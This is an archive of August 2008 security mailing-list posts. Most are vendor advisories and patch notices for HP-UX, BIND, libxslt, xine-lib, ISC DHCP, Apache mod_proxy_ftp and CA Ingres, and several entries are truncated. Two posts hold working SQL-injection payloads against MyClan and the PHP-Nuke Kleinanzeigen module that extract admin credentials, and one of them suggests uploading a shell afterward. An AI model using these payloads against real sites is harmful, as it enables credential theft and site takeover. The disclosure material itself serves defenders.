[security bulletin] HPSBUX02355 SSRT080023 rev.1 - HP-UX Using libc, Remote Denial of Service (DoS)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01520421 Version: 1 HPSBUX02355 SSRT080023 rev.1 - HP-UX Using libc, Remote Denial of Service (DoS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2008-08-06 Last Updated: 2008-08-06 Potential Security Impact: Remote Denial of Service (DoS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified in HP-UX using libc. This vulnerability could be exploited remotely to create a Denial of Service (DoS). References: CVE-2008-1664 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.23 and B.11.31 using libc. BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2008-1664 (AV:N/AC:L/Au:S/C:N/I:P/A:C) 7.5 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002. RESOLUTION HP is providing the following software patches to resolve the vulnerability. The patches are available from: http://itrc.hp.com HP-UX Release - HP-UX B.11.23 (11i v2) Action - Install PHCO_38273 or subsequent HP-UX Release - HP-UX B.11.31 (11i v3) Action - Install PHCO_38048 or subsequent MANUAL ACTIONS: No PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all HP Security Bulletin issues and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa The following is for use by the HP-UX Software Assistant. AFFECTED VERSIONS HP-UX B.11.23 === OS-Core.C-MIN OS-Core.C-MIN-64ALIB OS-Core.CORE2-64SLIB OS-Core.CORE2-SHLIBS ProgSupport.PROG2-AUX OS-Core.C-MIN,fr=B.11.23 OS-Core.C-MIN-64ALIB OS-Core.CORE2-64SLIB OS-Core.CORE2-SHLIBS ProgSupport.PROG-AX-64ALIB ProgSupport.PROG-MIN ProgSupport.PROG2-AUX action: install patch PHCO_38273 or subsequent URL: http://itrc.hp.com HP-UX B.11.31 === OS-Core.CORE-64SLIB OS-Core.CORE-SHLIBS OS-Core.C-MIN OS-Core.C-MIN-64ALIB OS-Core.CORE2-64SLIB OS-Core.CORE2-SHLIBS ProgSupport.PROG2-AUX OS-Core.C-MIN,fr=B.11.31 OS-Core.C-MIN-64ALIB ProgSupport.PROG-AX-64ALIB ProgSupport.PROG-MIN ProgSupport.PROG2-AUX action: install patch PHCO_38048 or subsequent URL: http://itrc.hp.com END AFFECTED VERSIONS HISTORY Version: 1 (rev.1) 6 August 2008 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED] It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: [EMAIL PROTECTED] Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with cur
[security bulletin] HPSBUX02351 SSRT080058 rev.3 - HP-UX Running BIND, Remote DNS Cache Poisoning
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01506861 Version: 3 HPSBUX02351 SSRT080058 rev.3 - HP-UX Running BIND, Remote DNS Cache Poisoning NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2008-07-16 Last Updated: 2008-08-06 Potential Security Impact: Remote DNS cache poisoning Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP-UX running BIND. The vulnerability could be exploited remotely to cause DNS cache poisoning. References: CVE-2008-1447 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11, B.11.23, B.11.31 running BIND v9.3.2 or BIND v9.2.0, HP-UX B.11.11 running BIND v8.1.2 BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2008-1447 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002. RESOLUTION HP has provided the following software updates / patch to resolve the vulnerabilities for BIND v9.2.0 and BIND v9.3.2. Customers running BIND v8.1.2 on HP-UX B.11.11 should upgrade to BIND v9.2.0 or BIND v9.3.2 and apply the updates listed below. The BIND v9.2.0 update is available for download from: ftp://ss080058:[EMAIL PROTECTED] The patch PHNE_37865 is available from: http://itrc.hp.com The BIND v9.3.2 updates are available for download from: http://software.hp.com HP-UX Release - B.11.11 running v8.1.2 Action - Upgrade to BIND v9.2.0 or BIND v9.3.2 and apply the updates listed below HP-UX Release - B.11.11 running v9.2.0 BIND Depot name - BIND920v11.depot MD5 Sum - F6999280DE19645EF86FF52083AACD72 HP-UX Release - B.11.23 running v9.2.0 Action - Install PHNE_37865 HP-UX Release - B.11.11 running v9.3.2 Action - Install revision C.9.3.2.3.0 or subsequent HP-UX Release - B.11.23 running v9.3.2 Action - Install revision C.9.3.2.3.0 or subsequent HP-UX Release - B.11.31 running v9.3.2 Action - Install revision C.9.3.2.3.0 or subsequent Note: HP is aware of performance issues with these updates / patch. All customers should test the updates / patch in their environment. HP is investigating changes to reduce the performance issues. This bulletin will be revised when new updates / patch become available. MANUAL ACTIONS: Yes - NonUpdate For B.11.11 running v8.1.2, upgrade to BIND v9.2.0 or BIND v9.3.2 and apply the updates For B.11.11 running v9.2.0 install BIND920v11.depot PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security Bulletins and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa AFFECTED VERSIONS For BIND v8.1.2 HP-UX B.11.11 = InternetSrvcs.INETSVCS-RUN action: upgrade to BIND v9.2.0 or BIND v9.3.2 and apply the updates For BIND v9.3.2 HP-UX B.11.11 = BindUpgrade.BIND-UPGRADE action: install revision C.9.3.2.3.0 or subsequent URL: http://software.hp.com HP-UX B.11.23 = BindUpgrade.BIND-UPGRADE BindUpgrade.BIND2-UPGRADE action: install revision C.9.3.2.3.0 or subsequent URL: http://software.hp.com HP-UX B.11.31 = NameService.BIND-AUX NameService.BIND-RUN action: install revision C.9.3.2.3.0 or subsequent URL: http://software.hp.com For BIND v9.2.0 HP-UX B.11.11 = BINDv920.INETSVCS-BIND action: install revision B.11.11.01.011 or subsequent URL: ftp://ss080058:[EMAIL PROTECTED] HP-UX B.11.23 = InternetSrvcs.INETSVCS-INETD InternetSrvcs.INETSVCS-RUN InternetSrvcs.INETSVCS2-RUN action: install patch PHNE_37865 or subsequent URL: http://itrc.hp.com END AFFECTED VERSIONS HISTORY Version:1 (rev.1) - 16 July 2008 Initial release Version:2 (rev.2) - 19 July 2008 Added BIND v9.2.0 depot information Version:3 (rev.3) - 06 August 2008 Updated patch location, revised BIND v9.2.0 depot information, added BIND v8.1.2 Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED] It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message
[ GLSA 200808-06 ] libxslt: Execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200808-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: libxslt: Execution of arbitrary code Date: August 06, 2008 Bugs: #232172 ID: 200808-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis libxslt is affected by a heap-based buffer overflow, possibly leading to the execution of arbitrary code. Background == libxslt is the XSLT C library developed for the GNOME project. XSLT is an XML language to define transformations for XML. Affected packages = --- Package / Vulnerable / Unaffected --- 1 dev-libs/libxslt < 1.1.24-r1>= 1.1.24-r1 < 1.1.8 Description === Chris Evans (Google Security) reported that the libexslt library that is part of libxslt is affected by a heap-based buffer overflow in the RC4 encryption/decryption functions. Impact == A remote attacker could entice a user to process an XML file using a specially crafted XSLT stylesheet in an application linked against libxslt, possibly leading to the execution of arbitrary code with the privileges of the user running the application. Workaround == There is no known workaround at this time. Resolution == All libxslt users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/libxslt-1.1.24-r1" References == [ 1 ] CVE-2008-2935 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2935 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200808-06.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: OpenPGP digital signature
[USN-635-1] xine-lib vulnerabilities
=== Ubuntu Security Notice USN-635-1August 06, 2008 xine-lib vulnerabilities CVE-2008-0073, CVE-2008-0225, CVE-2008-0238, CVE-2008-0486, CVE-2008-1110, CVE-2008-1161, CVE-2008-1482, CVE-2008-1686, CVE-2008-1878 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.04 Ubuntu 7.10 Ubuntu 8.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libxine-main1 1.1.1+ubuntu2-7.9 Ubuntu 7.04: libxine-main1 1.1.4-2ubuntu3.1 Ubuntu 7.10: libxine11.1.7-1ubuntu1.3 Ubuntu 8.04 LTS: libxine11.1.11.1-1ubuntu3.1 After a standard system upgrade you need to restart applications linked against xine-lib to effect the necessary changes. Details follow: Alin Rad Pop discovered an array index vulnerability in the SDP parser. If a user or automated system were tricked into opening a malicious RTSP stream, a remote attacker may be able to execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-0073) Luigi Auriemma discovered that xine-lib did not properly check buffer sizes in the RTSP header-handling code. If xine-lib opened an RTSP stream with crafted SDP attributes, a remote attacker may be able to execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-0225, CVE-2008-0238) Damian Frizza and Alfredo Ortega discovered that xine-lib did not properly validate FLAC tags. If a user or automated system were tricked into opening a crafted FLAC file, a remote attacker may be able to execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-0486) It was discovered that the ASF demuxer in xine-lib did not properly check the length if the ASF header. If a user or automated system were tricked into opening a crafted ASF file, a remote attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-1110) It was discovered that the Matroska demuxer in xine-lib did not properly verify frame sizes. If xine-lib opened a crafted ASF file, a remote attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-1161) Luigi Auriemma discovered multiple integer overflows in xine-lib. If a user or automated system were tricked into opening a crafted FLV, MOV, RM, MVE, MKV or CAK file, a remote attacker may be able to execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-1482) It was discovered that xine-lib did not properly validate its input when processing Speex file headers. If a user or automated system were tricked into opening a specially crafted Speex file, an attacker could create a denial of service or possibly execute arbitrary code as the user invoking the program. (CVE-2008-1686) Guido Landi discovered a stack-based buffer overflow in xine-lib when processing NSF files. If xine-lib opened a specially crafted NSF file with a long NSF title, an attacker could create a denial of service or possibly execute arbitrary code as the user invoking the program. (CVE-2008-1878) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.1+ubuntu2-7.9.diff.gz Size/MD5:25244 c709cf6894d6425dd46e8f132615573c http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.1+ubuntu2-7.9.dsc Size/MD5: 1113 f70db346860ad8541f3681154e9bf3bc http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.1+ubuntu2.orig.tar.gz Size/MD5: 6099365 5d0f3988e4d95f6af6f3caf2130ee992 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.9_amd64.deb Size/MD5: 116324 84bb0ee2f6090e64162ff2f2a0f020f1 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-main1_1.1.1+ubuntu2-7.9_amd64.deb Size/MD5: 2616066 1a99049356180801943cf96c0263fe28 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.9_i386.deb Size/MD5: 116320 6dc097583c9ad936b94ced44a8616c27 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-main1_1.1.1+ubuntu2-7.9_i386.deb Size/MD5: 2935352 acfa8daaf8ea120c1beadc1926eaf08d powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.9_powerpc.deb Size/MD5: 116334 c35db71e1841640f35b6eb7010baf3d3 http://security.ubuntu.com/ubuntu/pool/main/x/
[ GLSA 200808-05 ] ISC DHCP: Denial of Service
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200808-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: ISC DHCP: Denial of Service Date: August 06, 2008 Bugs: #227135 ID: 200808-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A Denial of Service vulnerability was discovered in ISC DHCP. Background == ISC DHCP is ISC's reference implementation of all aspects of the Dynamic Host Configuration Protocol. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 net-misc/dhcp < 3.1.1 >= 3.1.1 Description === A buffer overflow error was found in ISC DHCP server, that can only be exploited under unusual server configurations where the DHCP server is configured to provide clients with a large set of DHCP options. Impact == A remote attacker could exploit this vulnerability to cause a Denial of Service. Workaround == There is no known workaround at this time. Resolution == All ISC DHCP users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/dhcp-3.1.1" References == [ 1 ] CVE-2007-0062 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0062 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200808-05.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: OpenPGP digital signature
Apache HTTP Server mod_proxy_ftp Wildcard Characters Cross-Site Scripting
Rapid7 Advisory R7-0033 Apache HTTP Server mod_proxy_ftp Wildcard Characters Cross-Site Scripting Discovered: July 25, 2008 Published: August 5, 2008 Revision: 1.1 http://www.rapid7.com/advisories/R7-0033 CVE: CVE-2008-2939 1. Affected system(s): KNOWN VULNERABLE: o Apache HTTP Server 2.2.9 (and earlier 2.2.x versions) o Apache HTTP Server 2.0.63 (and earlier 2.0.x versions) NOT VULNERABLE: o Apache HTTP Server 1.3.x (because mod_proxy_ftp doesn't support wildcard characters) 2. Summary The mod_proxy_ftp module of the Apache HTTP Server is vulnerable to a cross-site scripting vulnerability when handling requests with wildcard characters (aka globbing characters). 3. Vendor status and information Apache HTTP Server Project http://httpd.apache.org The developers were notified of this vulnerability on July 28, 2008 via the private security mailing list [EMAIL PROTECTED] They acknowledged it within 12 hours. On July 29, they assigned it a CVE ID. On August 5, the vulnerability was fixed in all SVN branches: o Commit to main trunk: http://svn.apache.org/viewvc?view=rev&revision=682868 o Commit to 2.2 branch: http://svn.apache.org/viewvc?view=rev&revision=682870 o Commit to 2.0 branch: http://svn.apache.org/viewvc?view=rev&revision=682871 4. Solution Upgrade to Apache HTTP Server 2.2.10 or 2.0.64 (as of August 6, these have not been released yet), or apply the patch from SVN commit r682868. 5. Detailed analysis When Apache HTTP Server is configured with proxy support ("ProxyRequests On" in the configuration file), and when mod_proxy_ftp is enabled to support FTP-over-HTTP, requests containing wildcard characters (asterisk, tilde, opening square bracket, etc) such as: GET ftp://host/* HTTP/1.0 lead to cross-site scripting in the response returned by mod_proxy_ftp: [...] Directory of ftp://host/* [...] To exploit this vulnerability, 'host' must be running an FTP server, and the last directory component of the path (the XSS payload) must be composed of at least 1 wildcard character and must not contain any forward slashes. In practice, this last requirement is not an obstacle at all to develop working exploits, example: ftp://host/* 6. Credit Discovered by Marc Bevand of Rapid7. 7. Contact Information Rapid7, LLC Email: [EMAIL PROTECTED] Web: http://www.rapid7.com Phone: +1 (617) 247-1717 8. Disclaimer and Copyright Rapid7, LLC is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice. This advisory Copyright (C) 2008 Rapid7, LLC. Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact.
Google Notebook and Google Bookmarks Cross Site Scripting Vulnerabilities
I. Background: Google Notebook is a service where it's possible to "add text, images, and links from web pages without leaving your browser window." Google Bookmarks is a service where it's possible to save bookmarks. II. Description: Three cross site scripting vulnerabilities were identified inside Google Notebook. A remote attacker can make a malformed block notes and invite, through the sharing option inside Google Notebook, other users to see it to obtain their cookie. User interaction is required to exploit all three vulnerabilies. Browser affected: Firefox 3. Browser not affected: Internet Explorer 7, Opera 9.5, Safari 3. One cross site scripting vulnerability was identified inside Google Bookmarks. A remote attacker can make a malformed bookmark inside his account and then share it with other users to obtain their cookie. User interaction is required to exploit this vulnerability. Browser affected: Mozilla Firefox 3, Internet Explorer 7, Opera 9.5, Safari 3 III. Vendor Response: Google acknowledged 4 vulnerabilities and has deployed a fix for them. IV. Disclosure timeline: 23/07/08 - First vulnerability discovered 23/07/08 - Google informed 24/07/08 - Google confirmed first bug 31/07/08 - Google fixed the first vulnerability 31/07/08 - Three new vulnerabilities discovered 31/07/08 - Google informed 31/07/08 - Google confirmed these three new bugs 01/08/08 - Google fixed all vulnerabilities submitted Regards Alfredo Melloni
CA Products That Embed Ingres Multiple Vulnerabilities
Title: CA Products That Embed Ingres Multiple Vulnerabilities CA Advisory Date: 2008-08-01 Reported By: iDefense Labs Impact: A remote attacker can execute arbitrary code, gain privileges, or cause a denial of service condition. Summary: CA products that embed Ingres contain multiple vulnerabilities that can allow a remote attacker to execute arbitrary code, gain privileges, or cause a denial of service condition. These vulnerabilities exist in the products and on the platforms listed below. These vulnerabilities do not impact any Windows-based Ingres installation. The first vulnerability, CVE-2008-3356, allows an unauthenticated attacker to potentially set the user and/or group ownership of a verifydb log file to be Ingres allowing read/write permissions to both. The second vulnerability, CVE-2008-3357, allows an unauthenticated attacker to exploit a pointer overwrite vulnerability to execute arbitrary code within the context of the database server process. The third vulnerability, CVE-2008-3389, allows an unauthenticated attacker to obtain ingres user privileges. However, when combined with the unsecured directory privileges vulnerability (CVE–2008-3357), root privileges can be obtained. Mitigating Factors: These vulnerabilities do not impact any Windows-based Ingres installation. Severity: CA has given these vulnerabilities a High risk rating. Affected Products: Admin r8.1 SP2 Advantage Data Transformer r2.2 Allfusion Harvest Change Manager r7.1 CA ARCserve Backup for Unix r11.1, r11.5 GA/SP1/SP2/SP3 CA ARCserve Backup for Linux r11.1, r11.5 GA/SP1/SP2/SP3 CA Directory r8.1 CA Job Management Option R11.0 CA Single Sign-On r8.1 CleverPath Aion BPM r10.1, r10.2 EEM 8.1, 8.2, 8.2.1 eTrust Audit/SCC 8.0 sp2 Identity Manager r12 NSM 3.0 0305, 3.1 0403, r3.1 SP1 0703, r11 Unicenter Asset Management r11.1, r11.2 Unicenter Remote Control r11.2 Unicenter Service Catalog r2.2, r11.1 Unicenter Service Metric Analysis r11.1 Unicenter ServicePlus Service Desk 6.0, r11, r11.1, r11.2 Unicenter Software Delivery r11.1, r11.2 Unicenter Workload Control Center r11 Affected Platforms: 1. Ingres verifydb file create permission override (CVE-2008-3356) This vulnerability impacts all platforms except Windows. 2. Ingres un-secure directory privileges with utility ingvalidpw (CVE - 2008-3357) This vulnerability impacts only Linux and HP platforms. 3. Ingres verifydb, iimerge, csreport buffer overflow (CVE-2008-3389) This vulnerability impacts only Linux and HP platforms. Status and Recommendation: The most prudent course of action for affected customers is to download and apply the corrective maintenance. However, updates are provided only for the following releases: 2.6 and r3 Important: Customers using products that embed an earlier version of Ingres r3 should upgrade Ingres to the release that is currently supported (3.0.3/103 on Linux and 3.0.3/211 on UNIX platforms) before applying the maintenance updates. Please contact your product's Technical Support team for more information. For these products: Admin r8.1 SP2 CA ARCserve Backup for Linux r11.5 SP2/SP3 CA Directory r8.1 CA Job Management Option R11.0 CA Single Sign-On r8.1 EEM 8.2 EEM 8.2.1 Identity Manager r12 NSM r11 Unicenter Asset Management r11.1 Unicenter Asset Management r11.2 Unicenter Remote Control r11.2 Unicenter Service Catalog r11.1 Unicenter Service Metric Analysis r11.1 Unicenter ServicePlus Service Desk r11 Unicenter ServicePlus Service Desk r11.1 Unicenter ServicePlus Service Desk r11.2 Unicenter Software Delivery r11.1 Unicenter Software Delivery r11.2 Unicenter Workload Control Center r11 Apply the update below that is listed for your platform (note that URLs may wrap): AIX [3.0.3 (r64.us5/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12833-r64-us5.tar.z HP-UX Itanium [3.0.3 (i64.hpu/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12831-i64-hpu.tar.z HP-UX RISC [3.0.3 (hp2.us5/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12830-hp2-us5.tar.z Linux AMD [3.0.3 (a64.lnx/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12835-a64-lnx.tar.z Linux Intel 32bit [3.0.3 (int.lnx/103)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.103.12836-int-lnx.tar.z Linux Itanium [3.0.3 (i64.lnx/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12838-i64-lnx.tar.z Solaris SPARC [3.0.3 (su9.us5/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12834-su9-us5.tar.z Solaris x64/x86 [3.0.3 (a64.sol/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12832-a64-sol.tar.z Ingres r3 Vulnerability Updates Install Steps (August 1, 2008) Unix/Linux: 1. Log on to your system using the installation owner account and make sure the environmen
Interesting things at sec-consult.com, DNS-whitepaper available tomorrow
Hello, We recently decided to release some of our research to the public, so selected presentations from our internal tech meetings will from now on be available for download at SEC Consult website. The presentations (some of which are in german) will include everything from general howtos to highly specialized pentesting-stuff. We will also release a whitepaper on a variant of the new DNS poisoning attack tomorrow. We wrote this whitepaper along with an exploit a while ago, and somehow managed NOT to leak it to the press before the Kaminsky talk :) The presentations and whitepapers, along with our past presentations from Blackhat and Deepsec, can be found at: http://www.sec-consult.com/publikationen_e.html Here are some links to what is already online: * A german guide to WEP/WPA cracking, by Johannes Greil: http://www.sec-consult.com/files/Wireless_LAN_attacks_wo_fancy_style.pdf * A presentation on the method of using DLL injection to interface to an SSL connection used by a running process (I used this for blackbox-testing certain binary SSL client/server applications): http://www.sec-consult.com/files/SSL_Packet_Injection_BMU.pdf * A short presentation on a method of error-based SQL injection in Sybase databases, by Thomas Kerbl: http://www.sec-consult.com/files/Sybase_ModSecurity_Evasion_TKE.pdf I hope that some of you will find this useful. Regards, Bernhard (Certified Internet Security Superstar) -- _ Bernhard Mueller Security Consultant SEC Consult Unternehmensberatung GmbH www.sec-consult.com A-1190 Vienna, Mooslackengasse 17 phone +43 1 8903043 34 fax +43 1 8903043 15 mobile+43 676 840301 718 email [EMAIL PROTECTED] Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223 Firmensitz: Prof. Dr. Stephan Korenstraße 10, A-2700 Wiener Neustadt Advisor for your information security.
Re: 8e6 Technologies R3000 Internet Filter Bypass with Host Decoy
I've been testing this and it appears that *any* HTTP 1.0 request will bypass the 8e6 filter (if there is not an IP in the library). I've been testing this by using scapy to generate the HTTP GET request. 1.0 succeeds and 1.1 fails.
MyClan Sql Injection
# MyClan Sql Injection # # #AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #Our Site : Http://IRCRASH.COM #IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) # # #Script Download : www.sourceforge.net/projects/haudenschilt # #DORK : Copyright A© 2005-2006 Battle.net Clan Script 1.5.2 # # # [Bug] # #http://Site/index.php?page=members&showmember='+union+select+name,1,2,password+from+bcs_members/* #http://Site/index.php?page=board&thread=-+union+select+0,1,password,name,4,5,6,7+from+bcs_members/* # # [Note] # #If you inject and crack admin password you can upload shell in medal pasge in admin panel ;) # # # Site : Http://IRCRASH.COM ## TNX GOD ##
PHP-NUKE module Kleinanzeigen SQL injection (lid)
## # Rbt-4 crew # http://www.rbt-4.net # Author : Lovebug # # # # Remote Sql injection Php-Nuke module name Kleinanzeigen ## # modules.php?name=Kleinanzeigen&a_op=visit&lid=[sql] # # Exploit # # username : -1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Caid%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A # pwd : -1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A ##
rPSA-2008-0246-1 gaim
rPath Security Advisory: 2008-0246-1 Published: 2008-08-05 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Indirect User Deterministic Unauthorized Access Updated Versions: [EMAIL PROTECTED]:1/1.5.0-4.3-1 rPath Issue Tracking System: https://issues.rpath.com/browse/RPL-2647 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2927 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2956 Description: Previous versions of the gaim package are vulnerable to multiple attacks, the most serious of which may allow a remote attacker to exploit the MSN protocol handler and thus execute arbitrary code as the user running gaim. http://wiki.rpath.com/Advisories:rPSA-2008-0246 Copyright 2008 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html
rPSA-2008-0245-1 cups
rPath Security Advisory: 2008-0245-1 Published: 2008-08-05 Products: rPath Linux 1 Rating: Severe Exposure Level Classification: Remote Root Deterministic Unauthorized Access Updated Versions: [EMAIL PROTECTED]:1/1.1.23-14.8-1 rPath Issue Tracking System: https://issues.rpath.com/browse/RPL-2390 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1374 Description: Previous versions of the cups package are vulnerable to an Arbitrary Code Execution attack in which an attacker may use a maliciously crafted PDF file to trigger an integer overflow on 64-bit platforms. http://wiki.rpath.com/Advisories:rPSA-2008-0245 Copyright 2008 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html
[ GLSA 200808-04 ] Wireshark: Denial of Service
